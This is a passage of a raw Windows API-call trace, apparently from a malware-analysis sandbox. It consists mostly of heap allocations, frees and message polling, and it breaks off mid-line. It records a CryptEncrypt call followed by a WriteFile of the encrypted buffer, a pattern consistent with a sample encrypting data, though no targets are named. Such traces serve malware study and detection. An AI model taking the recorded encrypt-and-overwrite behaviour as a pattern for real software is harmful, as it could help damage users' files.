RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0264.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0264.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0264.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0264.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0264.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.719] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0264.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0264.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0264.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0264.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0264.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0264.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xa81) returned 0x2f18a58 [0264.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0264.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f18a58 | out: hHeap=0x970000) returned 1 [0264.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0264.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0264.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e565e8 [0264.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0264.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.730] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0264.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0264.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0264.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0264.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0264.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0264.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0264.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0264.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51bc8 [0264.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51bc8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0264.733] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f17fc8*, pdwDataLen=0x8cef60*=0xa81, dwBufLen=0xa88 | out: pbData=0x2f17fc8*, pdwDataLen=0x8cef60*=0xa88) returned 1 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0264.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0264.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0264.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.734] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0264.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.735] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0264.735] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0264.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0264.735] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0264.735] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.735] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0264.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.735] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0264.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.736] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.736] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.736] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0264.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0264.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0264.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0264.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0264.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0264.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0264.737] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f16aa8*, nNumberOfBytesToWrite=0xa88, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16aa8*, lpNumberOfBytesWritten=0x8cf5e4*=0xa88, lpOverlapped=0x0) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16aa8 | out: hHeap=0x970000) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0264.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0264.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0264.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.738] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0264.738] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51748 [0264.739] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0264.739] RtlAllocateHeap 